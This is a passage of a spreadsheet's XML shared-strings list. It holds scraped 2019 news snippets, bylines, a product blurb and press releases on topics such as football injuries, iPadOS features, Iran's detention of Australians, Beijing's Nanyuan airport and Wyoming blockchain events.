    <t>In Stock - Dispatch in 1 - 2 business days Sold and delivered by Catch Limit per customer: 5 Protect your Kindle in simple but sleek style in this lightweight sleeve. Sporting a leather-look finish, this tech essential features a softly padded interior to help safeguard your your eReader against potential screen damage. Features: Kensington tech accessories Design: Simple Sleeve Made for Kindle Touch Colour: Black Sleek, leather-look finish Softly padded interior Device easily slides in &amp; out Lightweight &amp; slimline design Materials: Synthetic leather Dimensions (approx. cm): 21.1 x 1.3 (H x D) 12 MONTH WARRANTY</t>
  </si>
  <si>
    <t>Ben Weir</t>
  </si>
  <si>
    <t>Optus chief executive Allen Lew says he does not think the controversial merger will pose a threat to his company</t>
  </si>
  <si>
    <t>A trip Bernie Sanders took to Ottawa in 1987 helped forge his determination to transform the American health care system. Source link</t>
  </si>
  <si>
    <t>David Scutt</t>
  </si>
  <si>
    <t>Strong US data and renewed hope for a trade war truce propel stocks and bond yields sharply higher.</t>
  </si>
  <si>
    <t>De Bruyne &amp; Theo Walcott injury updates after Everton 1 Original Source Will Kevin De Bruyne be fit for Dinamo Zagreb? Man City are back in Champions League action on Tuesday night. Following a 3-0 away win at Shakhtar Donetsk in their opener, Man City host Dinamo Zagreb at the Etihad Stadium in midweek. Win, and City will be cruising towards the knockout stages of the competition. But will Pep Guardiola be able to select Kevin De Bruyne for the Zagreb game? De Bruyne is an injury doubt for the Champions League after he exited Saturday’s match at Everton with a knock to his ankle. Speaking after the game, the Belgian said “I think I feel fine”. De Bruyne says “I think I feel fine” when asked about a possible injury. Hardly a thorough diagnosis but it’s something — Sam Lee (@SamLee) September 28, 2019 Kevin De Bruyne after Everton Theo Walcott taken to hospital Everton lost winger Theo Walcott during the match against Man City. Walcott was taken off on a stretcher after he blocked a Raheem Sterling cross with his face. Everton have since released a statement which read: The club’s medical team will now follow concussion protocols as his recovery continues. Walcott has since been discharged from hospital following medical checks. It’s unclear when Walcott will be fit to play next. Everton’s next match is an away trip to Burnley in the Premier League on Saturday. | Another @theowalcott update… #EVEMCI pic.twitter.com/h9bEPQHGhg — Everton (@Everton) September 28, 2019 Everton 1 – Man City 3 Man City remain five points behind Liverpool at the top of the table. Gabriel Jesus fired the reigning champs ahead at Goodison Park following a De Bruyne assist. However, Everton leveled the match through Dominic Calvert-Lewin to even the score at the break. A Riyad Mahrez free-kick put City back ahead in the 71st, while Raheem Sterling bagged City’s killer third in the final stages. Also see: Manchester United vs Arsenal betting tips: Premier League match preview &amp; predictions. Leicester vs Newcastle betting tips: Premier League match preview &amp; predictions. Why you need a VPN? Cut chords: Watch everything (Netflix, BBC iPlayer, Hulu) online using a VPN. Unlock geoblocking: A VPN gives you access to the best content from anywhere in the world. Privacy &amp; security: A VPN keeps your information private, activity encrypted &amp; data anonymous. Just $6.67 a month + 3 months free!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‘1821170621460215’); // Insert your pixel ID here. fbq(‘track’, ‘PageView’);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De Bruyne &amp; Theo Walcott injury updates after Everton 1 appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Police believe the Kallangur man was driving a Ford Falcon ute near Tukuwompa Park at Joyner just before 1pm.</t>
  </si>
  <si>
    <t>Hilary Adair, 87, was trampled on and repeatedly attacked as she tried to get up, an inquest hears. The post Woman trampled to death by cattle at Linchmere Common, inquest hears appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Mario Toneguzzi</t>
  </si>
  <si>
    <t>Energy Disruptors: Unite 2019 is returning to Calgary this week. The event is intended to encourage action among world-renowned thought leaders to look at the greatest energy challenges as opportunities. The event takes place Tuesday and Wednesday at Stampede Park. The 2019 summit will be headlined by well-known author and speaker Malcolm Gladwell. “We have been overwhelmed with the positive responses from the event last year and are excited to continue the conversations that drive change,” said Graeme Edge, co-founder and chief instigator of Energy Disruptors. “The actions coming out of Energy Disruptors Unite are crucial in diversifying the energy landscape, seizing on the global opportunity of energy transformation and ensuring Alberta is well positioned for the future.” Malcolm Gladwell Energy Disruptors is the brainchild of Edge, Michelle Edge and Rachel Maxwell. Last year, Sir Richard Branson was the summit’s guest speaker and attracted 1,700 people. Energy Disruptors is a profit-for-purpose organization with a bold ambition to unite the entire spectrum of the energy industry around the common goal of accelerating pragmatic and profitable solutions to the world’s biggest energy challenges. “It’s a big future of energy and tech event that brings together oil and gas, renewables, energy storage, tech entrepreneurs, the folks from the transportation sector, investors and people interested in the environment, social forces and policy under one roof and try to find some common ground between those stakeholders when we think about the future of energy,” said Edge. “The purpose of this is to try to get some of those groups to collaborate, to accelerate solutions to big global energy problems.” Edge said the discussion around energy in the last few years has been extremely polarized but the summit is trying to have a more balanced conversation when talking about the future of energy. “In order to do that you’ve got to bring different perspectives together,” he said. “You’ve got to try to find some common ground between those groups. “We’re trying to get people to think about the future of energy as a tremendous opportunity rather than as a threat. It’s an incredibly exciting time in the world of energy. There’s a lot going on. There’s a lot of exciting new technologies and there’s a lot happening in the transportation sector. … There’s not one energy silver bullet. We’re going to need multiple forms of energy and multiple solutions.” Peter Tertzakian, executive director of ARC Energy Research Institute, will give a keynote speech called Disruption, Denial, and Transition (Perspectives from an Energyphile). It’s about the forces of change at work in our energy world. “Last year (the event) made a big splash. Everybody’s talking about disruption. We’re far from over in terms of seeing our business disrupted here,” he said. “Every industry is undergoing disruption. … Disruption is an epidemic that is affecting every industry with profound consequences. Every single corner of the economy is undergoing commercial or industrial disruption. The question is why is energy any different? It’s not. “When you talk about disruption in energy what immediately comes to mind is climate change, environment and renewables disrupting oil and gas. But in actual fact that’s only one dimension of the disruption that is weighing on the oil and gas industry. Some of the biggest disruptions are coming from within. We have seen incredible changes.” His next book on the industry is called The Investor Visit and Other Stories: Disruption, Denial and Transition in the Energy Business. “This conference is important because it brings people together to talk about these issues, to see what’s going on,” he said. “It’s a tough subject. It’s not easy to talk about. “We are undergoing disruption. We can’t be in denial about it although that’s a very human trait. But we are in transition. That’s not a bad thing if you understand it. Then you can strategize for it. My book, which is really a compilation of short stories about transition, helps people realize that we have seen these sorts of things in the past, nothing new, we can learn from the past. We can then embrace the present with those lessons from the past and importantly we can prepare for the future.” Gladwell is the author of five New York Times bestsellers, one of the 100 most influential people identified by Time magazine and one of the Foreign Policy’s Top Global Thinkers. Gladwell also has a popular 10-part podcast, Revisionist History, that’s now in its third season. He will bring a fresh perspective to problems faced in the energy industry with a wealth of knowledge from his experience at the New Yorker and The Washington Post. Last year’s moderator and speaker, Holly Ransom, has taken on a new role as a co-founder and owner. Ransom is a 2019 Fulbright Scholar and was named one of Australia’s 100 Most Influential Women by the Australian Financial Review. She was also Branson’s nominee for Wired Magazine’s Smart List of Future Game Changers to watch in 2017. Additionally, Ransom delivered a Peace Charter to the Dalai Lama, addressed the G20’s Central Bank Governors and Finance Ministers and was requested by Barack Obama in 2018 to interview him during his only engagement in Australia. “Last year, I was fortunate to experience first-hand how integral this event is in driving conversations and making real change in the energy sector and realized this was something special to be a part of,” said Ransom. “By bringing great minds from around the world to collaborate and work together towards a solution that benefits us all, real change can happen. Having been fortunate enough to be a part of the strategic planning conversations and ideation from when Energy Disruptors Unite was conceptualized it has been incredible to watch the momentum the team have built in such a short period of time. I cannot express how excited I am to be the fourth partner and co-founder for this summit.” Mario Toneguzzi is a Troy Media business reporter based in Calgary. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Calgary energy conference looks at disruption in industry appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>The August 11, 1995 crash was Canada’s deadliest accident on a rapid transit system.</t>
  </si>
  <si>
    <t>Jim Robertson</t>
  </si>
  <si>
    <t>Some pretty amazing TV revenue statistics. The excellent Swiss Ramble is a blog that looks at the business of football. He has been looking at the TV revenue earned by...Some pretty amazing TV revenue statistics. The excellent Swiss Ramble is a blog that looks at the business of football. He has been looking at the TV revenue earned by... You can click here to read the full article. The post The 20 clubs in Europe to earn most money from 2018-19 TV revenue – Featuring Newcastle United appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>keenri</t>
  </si>
  <si>
    <t>The iPadOS public beta has officially launched with a host of new features that from Apple that make your iPad distinct from an iPhone running iOS 13, and we’ve now had the first beta of 13.1 as well. We have a list of the best iPadOS features you’ll be able to experience in public beta 1 and 2. Sure, there are shared a lot of changes. After all, it “builds on the same foundation as iOS,” according to Apple, but expect iPadOS to grow more into its own operating system over time. iPadOS brings a variety of critical improvements to the tablet UI. Some of these make better use of screen real estate while others introduce new gesture controls (and even mouse support) for a better tablet experience. In short, iPad users won’t just run an upsized iOS any longer. iPadOS release date and public beta timing The iPadOS public beta release date landed on June 24, and it contains a lot of the features Apple shows us at its WWDC 2019 keynote. Since then, Apple has pushed a new version out to enrolled tablets, with iPadOS public beta 2 made available from July 8. From there we’ve had the first iPadOS 13.1 public beta, as the new changes move forward ahead of the impending ‘full’ release. We’ll see more features when the final version of the software exits beta, likely in September. In previous years September has been the month in which Apple rolls out its new software to the public to coincide with the launch of its new iPhones, and we expect the same activity around the iPhone 11 this year, which we now know is going to be unveiled on September 10. Which iPads will work with iPadOS? Apple has confirmed that the “iPad Air 2 and later, all iPad Pro models, iPad 5th generation and later, and iPad mini 4 and later” will all get the iPadOS update when it releases later this year. So which iPads are missing out this year, after getting iOS 12 in 2018? Well it’s the end of the update road for the original iPad Air, iPad Mini 2 and iPad Mini 3. It’s unclear if older iPads will be getting iOS 13 or if they’ve been completely left behind. The following iPads will get an update to iPadOS in (likely) September and October) (As a reminder, it’s always best to avoid using the beta version of software on a primary or daily-use device, as there can sometimes be erratic elements within the system – wait until the final version lands in the near future. iPad Pro 12.9 (2018) iPad Pro 12.9 (2017) iPad Pro 12.9 (2015) iPad Pro 11 (2018) iPad Pro 10.5 (2017) iPad Pro 9.7 (2016) iPad Air (2019) iPad Air 2 iPad (2018) iPad (2017) iPad Mini (2019) iPad Mini 4 Here’s everything Apple unveiled at WWDC 2019 New iPadOS home screen Today View alongside a tighter grid of apps on the new iPadOS home screen. Image credit: Apple The first big change over you’ll notice in iPadOS is on the new home screen. The grid of app icons is tighter, allowing you to fit more on the screen and reducing the amount of dead space on the display. With a tighter grid of apps, there’s now an option to show Today View alongside them, for a more useful overview screen. It can be added to the Home screen for quick access to widgets with a simple swipe from the left side of the screen, and you can switch out the widgets pinned here to display the ones most relevant to you. Sidecar is a big new change If you’re wondering what the biggest feature of iPadOS might be, Sidecar is a real contender. It natively bakes in wired (or wireless) support for using your iPad as a Mac second screen, bringing with it a whole host of functionality. How to use Sidecar with MacOS Catalina This mode effectively turns any iPad into a portable monitor, one with a powerful internal battery, allowing apps and multiple windows to be dragged onto its screen and interacted with using a mouse, keyboard or Apple Pencil. You can’t mess around with the resolution just yet, so you can’t work in super fine detail and may want to wait a little while until the final software launch appears in late September – but even at this early stage, Apple fans will find they’ve suddenly got a new screen for their Mac right in another pocket of their backpack. iPadOS has a new way to multitask Slide Over in iPadOS in action, with a side view of Messages over Safari. Image credit: Apple Multitasking also gets an upgrade on iPadOS is a few ways. First up, you’ll be able to use Split View to see two app windows at a time for the same app, or two different apps. iPadOS uses a drag-and-drop interface here, making switching between apps and windows easy. Slide Over lets you quickly pull up an app in a side window, over the top of another app – allowing you to quickly check things such as emails, messages or reminders without having to exit the current app you’re using. Dragging up from the bottom of the screen will allow you to move between apps in the Slide Over panel. Apple has also brought the Mac’s Exposé feature to iPadOS, allowing you to get an overview of all your open apps – making it easy to jump between them, and close down any you no longer need running in the background. These are all the new features coming to iOS 13 iPadOS gets USB drive and SD card support USB drive and SD card support arrives in iPadOS. Image credit: Apple External storage fans rejoice! iPadOS will allow you to plug a USB drive or SD card reader into your iPad, and the Files app will be able to read the plugin and allow you to easily manage data between the iPad’s internal storage and the external drive. Files gets a Column View to better take advantage of the iPad’s wide screen, and the iCloud Drive allows folder sharing, and will show content from a USB drive or SD card if they’re plugged in. There’s good news for photographers too, as support is being built into iPadOS to allow you to plug your camera into your iPad and import images directly into editing apps such as Lightroom. iPadOS performance boost Your current iPad could get a performance boost when iPadOS arrives, with Apple claiming that its tablet-specific operating system is quicker than iOS 12. It says Face ID unlocks are up to 30% faster, while apps launch up to twice as fast as on iOS 12 – and apps themselves should be smaller in download size (by up to 50%), taking up less of that precious storage space. Desktop-quality websites and browsing on iPadOS The Safari web browser is also improved with iPadOS, because it’s no longer purely tied to iOS and a mobile ecosystem. That’s right: you’re no longer just viewing mobile sites, as iPadOS views websites in a modified desktop view that’s a bit cleaner and optimized for touch. It doesn’t just work with Apple’s websites either – the likes of Google Docs and WordPress web apps will also work better with Safari on iPadOS. Apple’s browser will also get a download manager, 30 new keyboard shortcuts, and improved tab management when iPadOS lands later this year. New iPadOS gestures One of the bigger features across the whole of iPadOS are the new gestures. The ones we’ve seen are pretty simple: three-finger pinch to cut, three-finger splay to paste, three-finger swipe to undo. Easy. In some apps, you’ll also be able to two-finger-pinch the keyboard to shrink it to iOS mobile size and move it around. Plunk it next to the side of the screen and boom: you can type on it with one thumb. Add to that the new gestures for the home screen and multi-tasking, and there may be a learning curve required to get used to all the new interactions which come with iPadOS. Markup and much more on iPadOS Markup also gets an update, and you’ll be able to mark up entire web pages, documents and emails. A simple swipe up from the corner with your Apple Pencil launches markup and brings up the newly-redesigned tool palette, which can be dragged around and repositioned anywhere on the screen. And speaking of the Pencil, Apple has reduced the latency of its input from 20ms to 9ms, which means you’ll get a more natural, pen-like experience when using it. Plenty of new features that are coming to iOS 13 are also headed to iPadOS, like Dark Mode, custom fonts, the new Photos organized by machine learning, and the SwiftKey-like slide-and-type QuickPath keyboard feature. Mouse support for iPadOS iPadOS does supports connecting a mouse to your iPad, though it’s not something you’ll find front-and-center on the official iPadOS features list. Developer Steve Troughton-Smith initially tweeted out instructions he’d discovered to connect a mouse through new Accessibility settings, and Tom’s Guide successfully activated a mouse on an iPad. While it doesn’t seem to be the smoothest thing, we’re excited for a serious leap in the iPad family’s productivity potential and accessibility. Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: iPad OS: release date, features and public beta details</t>
  </si>
  <si>
    <t>(New York) Over the past few years, blockchain has been a hot topic in gaming with more developers and mainstream brands actively taking an interest in innovative technology. However, it is still too early to tell whether we are in the blockchain gaming revolution. Lots of blockchain games that exist today indeed were not built by game developers, but rather blockchain evangelists. Blockchain gaming has ranked as the fastest-growing gaming track in the United States, and developers are seeking the best opportunities to get their own money into the gaming market. A report conducted by Coinbase in 2019 discovered that 56% of the world’s top 50 universities are now offering at least one course on crypto or blockchain, including MIT, Harvard University, Stanford University, Cornell University and many more in the U.S. Since 2018, this number has increased by 14% as more and more U.S. universities and communities are preparing for upcoming development and mass adoption of those innovations. Believing blockchain will redefine the future of gaming, several explorers—such as EOS, TRON, Tezos, and NEO—have already hosted their first global DApp contests in the past year. These contests have received great amounts of mainstream media attention and attracted DApps from the traditional gaming world as well. Therefore, the Egretia North American Community (ENAC) initiated the 2019 Egretia Global DApp Contest, which unites support together from the Egretia Foundation and other blockchain partners. Egretia aims to combine HTML5—a programming language for structuring and presenting content online—with blockchain to create the world’s first HTML5 blockchain game ecosystem. Currently, users of HTML5 games already account for 47% of all mobile gamers. Egretia’s new technology could increase the popularity of blockchain apps. The Contest is planned to launch on October 1st, 2019 and will be open to global developers applying EGT, Egretia’s digital token, for in-game payment in their DApps. ENAC hopes that participants will be able to use the digital token in their own games. For example, users can apply it to buying or selling items, paying for content, taking part in promotions, or getting EGT as a reward for participating in crowdfunding campaigns. Participants can submit their business plans or DApps by November 15th, 2019 at midnight EST. During the contest, ENAC will also hold more than 10 global online and on-site meetups, training workshops and webinars to help participants learn about Egretia and its advantages. Competing teams will be supported by the brilliant minds in gaming and blockchain technology and will be armed with extraordinary hands-on mentorship throughout the contest. The winners will be offered a total of $300K bounty and reward, including further support for project development, incubation, and potential investment. The 2019 Egretia Global DApp Contest is expected to increase the number of use cases for Egretia and its technology among global blockchain developers, game studios and other potential gamers. More gaming DApps will continue to be built by game studios and developers, which will bring new blood into the Egretia global gaming ecosystem. Undoubtedly, Egretia’s global DApp competition will not only bring Egretia to a broader stage, but it will also bring blockchain gaming to the next level. This is a paid-for submitted press release. CCN does not endorse, nor is responsible for any material included below and isn’t responsible for any damages or losses connected with any products or services mentioned in the press release. CCN urges readers to conduct their own research with due diligence into the company, product or service mentioned in the press release. Last modified (UTC): September 27, 2019 10:42 PM</t>
  </si>
  <si>
    <t>Annie Brown</t>
  </si>
  <si>
    <t>When to use it, how to use it, why you shouldn't be afraid of it. Plus, the buzzy natural alternative.</t>
  </si>
  <si>
    <t>VIKINGS has a huge final season ahead of it, and fans of the show are anticipating a lot of battles and brutal conflicts in the coming episodes – but could Lagertha be the first person to be killed off? Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>The Edmonton Eskimos snapped a four-game losing streak with a 21-16 win over the Ottawa Redblacks on Saturday.</t>
  </si>
  <si>
    <t>Iran confirms UK and Australian citizens are being detained Original Source Two British-Australians and an Australian national are being held in Iran for spying and “taking images at sensitive areas”, Tehran has said. Kylie Moore-Gilbert, a Cambridge-educated academic who was most recently a lecturer in Islamic Studies at Melbourne University, has been in Tehran’s notorious Evin prison for almost a year, having reportedly been given a 10-year sentence. Another British-Australian woman, Jolie King, and her Australian boyfriend Mark Firkin, have been held for the past 10 weeks in an unrelated incident. The trio’s detentions came to light last week and the Australian Government said it is lobbying Tehran to ensure all three are appropriately cared for. " data-on-all-screens="true"&gt; Sorry, this content isn’t available on your device. Iran’s semi-official news agency Fars reported that the Islamic Republic’s judiciary spokesman Gholam Hossein Esmayeeli confirmed their detention for spying. “These individuals have been detained in two cases and indictments have been issued for both,” he said. One of the cases referred to images taken by two foreign nationals in military and banned zones, and “the images have been retrieved from the memory of the camera which has been discovered and seized from them,” he added. “In a separate case, a foreign national has been accused of spying for another country and the court will judge if this person has done a crime or not.” View this post on Instagram The Karakoram Highway. The highest paved international road in the world topping out at around 4800m, and somewhere we had been looking forward to getting to for months. . The Highway stretches for 1300kms weaving through the lower more green and open landscape, up into the narrow and steep valleys, then over the snow capped Khunjerab Pass. . In the pic is the Passu Cones. Like the rest of the scenery it is pretty spectacular, isn’t it!? . (To our very generous Patreons, new video’s up now! 🙂) . . . . . . . . . #pakistan #karakoram #overland #vanlife #roadtrip #expedition #vlog #troopy #4wd #landcruiser #youtube #thekarakoramclub #toyota #troopcarrier #cnntravel #mountain #bbctravel #4×4 #travellingthroughtheworld #projectvanlife #hunza #passu #passucones #overlandjournal #hdj78r #camperlifestyle #expeditionportal #iamtb #gilgit #nature A post shared by T.W.O – The Way Overland (@thewayoverland) on Jun 9, 2019 at 12:10am PDT " data-on-all-screens="true"&gt; Sorry, this content isn’t available on your device. The University of Melbourne’s website lists Dr Moore-Gilbert on its “Find an expert” page as a lecturer at the university’s Asia Institute. It says she “specialises in Middle Eastern politics, with a particular focus on the Arab Gulf states,” and that she had published work on the 2011 Arab uprisings, authoritarian governance and on the role of new media technologies in political activism. The Department of Foreign Affairs and Trade on Saturday released a statement from Dr Moore-Gilbert’s family, which said: “We have been and continue to be in close contact with the Australian Government. “Our family thanks the Government and the University of Melbourne for their ongoing support at this distressing and sensitive time. We believe that the best chance of securing Kylie’s safe return is through diplomatic channels. “We will not be making any further comment and would like to request that our privacy – and that of our wider family and friends – is respected at this time.” Although Iranian authorities have not made public the charges against Dr Moore-Gilbert, 10-year sentences have regularly been given to those convicted of spying. " data-on-all-screens="true"&gt; Sorry, this content isn’t available on your device. Dr David Malet, who served on Ms Moore-Gilbert’s dissertation committee, tweeted: “Very distraught to learn Kylie Moore-Gilbert has been in solitary confinement for a year and faces 10-year sentence. “She’s a wonderful person and a serious scholar, not a spy.” Ms King and Mr Firkin, who left their home in Perth, Western Australia, in 2017, had been posting updates on their trip across Asia on social media before being arrested. Evin prison, the main detention centre for Iran’s political prisoners, also houses 41-year-old Nazanin Zaghari-Ratcliffe, a British-Iranian mother of one who is midway through a five year sentence on spying charges which began in 2016.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Iran confirms UK and Australian citizens are being detained appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Belarusian Latvian Dictionary – travel dictionary to translate Belarusian to Latvian. Click on the list to show Belarusian or Latvian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Belarusian Latvian Dictionary →</t>
  </si>
  <si>
    <t>Chinese Tibetan Dictionary – travel dictionary to translate Chinese to Tibetan. Click on the list to show Chinese or Tibetan synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Chinese Tibetan Dictionary →</t>
  </si>
  <si>
    <t>Angus Thompson</t>
  </si>
  <si>
    <t>A video of the former Kings Cross club owner grinning while holding up the eyebrows of another man has been played to a jury.</t>
  </si>
  <si>
    <t>▶️ INF1N1TE - UNBROKEN FEAT. LUMA🎵 Click that 🔔 to turn on notifications! DO NOT MISS AN UPLOAD! 🔽 Download/Stream this Song d(^_^)b 🔽 https://fanlink.to/unbroken_ Artwork by: https://www.pixiv.net/member_illust.php?mode=medium&amp;illust_id=65004575 🎶 Exclusive Drop the Bassline Playlists 🎶 🔸 Memes &amp; Themes: http://bit.ly/Memes-Themes 🔸 Trap: http://bit.ly/DTBTrap 🔸 Dubstep: http://bit.ly/DTBDubstep 🔸 Future Bass: http://bit.ly/DTBFuture 🔸 Electro House: http://bit.ly/DTBElectro 🔸 […] The post INF1N1TE – UNBROKEN FEAT. LUMA appeared first on Dubster.</t>
  </si>
  <si>
    <t>John Silvester</t>
  </si>
  <si>
    <t>After 36 years the Valour Award is given to a brave police officer who died in an ambush, shot down by his wife's lover.</t>
  </si>
  <si>
    <t>Beijing (CNN) — As Beijing’s new, multibillion-dollar airport opened with great fanfare last Wednesday, a piece of China’s history quietly closed its doors on the other side of the city. The country’s very first airport, Nanyuan Airport, shut its doors for good on September 25, the same date that Beijing’s new $11.5 billion Daxing Airport was opened by President Xi Jinping. The last flight, China United Airlines KN5830, left at just after 10 p.m., state media said. By Saturday, its doors were firmly shut and the car park mostly deserted. The few remaining dusty cars had a polite notice taped to their side window. “Hello! This airport has officially moved to Daxing International Airport on September 25 … I want to thank you again for putting your trust in Nanyuan Airport,” said the notice. Nanyuan first opened in 1910, 109 years ago, when China was still ruled by the Qing Dynasty. It has seen two world wars, China’s civil war and finally the founding of the People’s Republic of China in 1949. According to state-run China Daily, Nanyuan will become an aviation museum, while its practical functions will all be transferred to Daxing Airport. Superficially the two could not be more different. Daxing, designed by the late architect Zaha Hadid, is sleek and high-tech. Nanyuan is far more run down, with a brutally practical square shape and traces of rust showing. Nevertheless, even days after its closure, Beijing citizens were still flocking to the old terminal to pay their tributes to a slice of the city’s history. Xiang Wang, 33, visited the airport with his children and partner on Saturday, the first weekend after it closed, taking photos next to the historic displays put up by the government. “The Chinese dream took off from here,” he said. Wang Xiang and his young daughter pose in front of a sign commemorating the closure of Beijing’s Nanyuan Airport on September 29. CNN/Ben Westcott Wang, a PhD student at Tsinghua University, said that he deeply regretted not getting a ticket to fly out of Nanyuan one last time and was jealous of his classmates who got to work here. “We have feelings for this place,” he said. “It’s sad that Nanyuan is gone … I brought my 1-year-old son here. He probably won’t understand what I say to him about it, but he will have the memories.” Nanyuan has witnessed some pivotal moments in Chinese history. After the founding of the People’s Republic of China in 1949, the first squadron of the Communist air force to fly over Tiananmen departed from Nanyuan. In 1971, when then-US Secretary of State Henry Kissinger was flying into China in secret to arrange President Richard Nixon’s historic visit, he touched down at Nanyuan Airport. An abandoned guard post at Beijing’s Nanyuan Airport which closed its doors this week. CNN/Ben Westcott Chunqian Yin, a 34-year-old accountant, brought her son out to the airport so he could be part of the historic moment. “I will miss this airport very much. I used to see aircraft flying around here before, but now I won’t be able to anymore,” she said. Outside the museum there was a display with a countdown to the airport’s closure, which Yin said she’d visited regularly. But Yin said she also takes a philosophical approach to the airport’s closure. After all, she said, now the area might see a boom in construction as a result. “New things won’t come if old things don’t leave,” she said. China's first airport shuts its doors in Beijing after 109 years The post China's first airport shuts its doors in Beijing after 109 years appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Giveaways: Win tickets to Circus Oz, the Italian film festival and tulip festival</t>
  </si>
  <si>
    <t>From ACRONYM: Earlier this week, the NRA made a $200,000 donation to GOP Majority Leader Todd Gilbert’s “Majority Leader PAC”, the NRA’s largest-ever contribution to a Virginia PAC. While Republicans cashed in their gun lobby money, Democratic organizations and campaigns have continued to hammer home gun violence prevention in key swing races. How are Democratic and Republican campaigns messaging on gun safety issues in their digital ads? And which gun-focused outside groups are spending on digital in Virginia? We take a look in this week’s edition of FWIW Virginia. But first… 2019 by the numbers Here’s how Facebook spending by Republican and Democratic party committees and candidates in the most competitive districts compare since the primary election. Here are the top ten biggest Facebook spenders in Virginia from September 1-7: *Everytown for Gun Safety is running Virginia-specific ads from its national page. Because Facebook reports a spending range on individual ads, this number is an approximation of their weekly spend based on the spending range for their individual, Virginia-specific ads. Days left until the general election: 54 Deep Dive: How is gun safety playing in Virginia? While anti-gun safety groups like the NRA are mostly contributing to PACs and campaigns, gun safety organizations like Everytown for Gun Safety are spending big on digital ad campaigns in competitive districts. Because they spend through their national page, we can’t see their exact spending numbers on Virginia-specific ads, but our best approximation has them as last week’s top Facebook spender in Virginia. We haven’t found any recent electoral digital spending in Virginia from gun advocate groups like the NRA, but they were active during the special session to keep Republican lawmakers in line. Groups like the National Association for Gun Rights ran a series of digital ads to pressure Republican lawmakers like Kirk Cox (HD-66) and Tim Hugo (HD-40) into inaction after the mass shooting in Virginia Beach. In contrast, many Democratic campaigns are pressing gun safety as a top issue. Cheryl Turpin and Dan Helmer are among the many Democratic candidates who have run ads focused on their support for common-sense gun violence prevention measures. Helmer, in particular, has used his opponent Tim Hugo’s refusal to support background checks as his main line of attack throughout the election. Helmer’s campaign is currently running ads boosting a Washington Post editorial criticizing Hugo over his inaction, and his campaign has been hitting Hugo on the issue throughout the summer. Republicans, on the other hand, have struggled to reconcile their positions on gun violence prevention with the relatively “moderate” profile they’re attempting to cut in competitive districts. Sen. Glen Sturtevant (SD-10), in one of the bigger reaches we’ve seen this cycle, tried to claim in an ad that he’s not taking action on gun safety because he just wants to wait until after the election to take a tough vote. Spotlight: SD 8 – Missy Cotter Smasal (D) v. Sen. Bill Desteph (R) For our district spotlight this week, we’re taking a look at SD 8, where Democrat Missy Cotter Smasal is facing incumbent GOP Senator Bill Desteph. Source: Virginia Public Access Project SD 8 is a traditionally Republican-leaning district based in Virginia Beach. The district voted for Gillespie 53-44 in 2014 and for Trump 51-42 in 2016, but has trended towards Democrats since then. In 2017, Northam narrowly carried the district 50-49 and Kaine won it 52-46 in 2018. DeSteph first won the district in 2015, carrying nearly 59% of the vote. This year, he’s running for re-election against Navy veteran Missy Cotter Smasal. Since the primary, Cotter Smasal has outspent DeSteph over 2-to-1 on Facebook, running ads featuring her biography as a Navy veteran and on issues like gun safety and the environment. DeSteph’s campaign hasn’t run any Facebook ads in recent weeks, but earlier in August they ran a series of ads featuring testimonials from voters in the district and endorsements from organizations like the Virginia Professional Fire Fighters. Thanks for reading and make sure to sign up for weekly updates, follow us on Twitter and email us with ideas of what you’d like us to dive into next. – The team at ACRONYM P.S. Here’s a sign-up link for our national FWIW newsletter and you can find today’s issue here.</t>
  </si>
  <si>
    <t>Sea levels have been rising by an average of 5mm a year with much of the rise coming from glaciers and ice sheets that are melting ever more quickly.</t>
  </si>
  <si>
    <t>Our talented artists, illustrators and cartoonists give us their very own humorous version of the news of the day.</t>
  </si>
  <si>
    <t>HEALTH spending in the Northern Territory is the highest in the country.</t>
  </si>
  <si>
    <t>The plant operator has collected water used to stop fuel cores from melting since the March 2011 tsunami that caused the nuclear disaster.</t>
  </si>
  <si>
    <t>Guelph police say one suspect could be linked to a pair of reported indecent acts near the downtown core.</t>
  </si>
  <si>
    <t>Big tech companies, aspiring blockchain developers and state legislators “stampeded” to the University of Wyoming’s campus over the weekend for a series of events, competition, educational opportunities and legislative planning. Dubbed the “Blockchain Stampede,” the conference-competition hybrid featured the second annual WyoHackathon coding competition, meetings of the Wyoming Blockchain Task Force and opportunities to learn from industry leaders. Both the Hackathon and the Sandcastle competition centered around blockchain and cryptocurrency technology, which has also been the focus of recent conversations in the state Legislature as it looks to finally fulfill a years-long promise to diversify its economy, passing 13 blockchain-related bills last session. So far, the response seems to be positive; Rep. Tyler Lindholm, R-Sundance, told the Boomerang Thursday there are already about five different applicants to become Special Purpose Depository Institutions, essentially opening newly legislated cryptocurrency banks in Wyoming. “We haven’t had a bank chartered in the state of Wyoming in about a dozen years, and all of the sudden we’re looking at a minimum of five,” he said. “We’re expecting a total of up to 12, so it’s pretty cool.” Blockchain Task Force member Caitlin Long told the Boomerang that between the different companies vying for the SPDI charters, “the pipeline is about $20 billion of assets.” “We have that pipeline visibility now,” she said. “If all $20 billion gets here, that’s $4 million of revenue, which is about 2.5% of the state’s budget every year. The state didn’t spend any money to get that.” The biggest challenge so far, she said, has been “trying to stay ahead of this” to keep itself a leader in the industry. She added the group is now more focused on getting companies to the state. During the events this weekend, many companies were not only announcing intent to get the SPDI charters but also using the hackathon to potentially hire UW talent and even move their companies to the Cowboy State. Kraken CEO Jesse Powell noted his San Francisco, California-based crypto-asset exchange company is applying for an SPDI, and while negotiations are still ongoing on what the company’s presence will look like in Wyoming, he expects “at least 5-10 people employed here.” “It’s a great place to locate developers to, they have much more certainty here on the things that they’re building if they’re building blockchain-related things, because of some of the recent bills that were passed,” Powell told the Boomerang Saturday. Wyoming also has its challenges; He noted getting upper-level management in tech companies to want to move from expensive tech-hubs like San 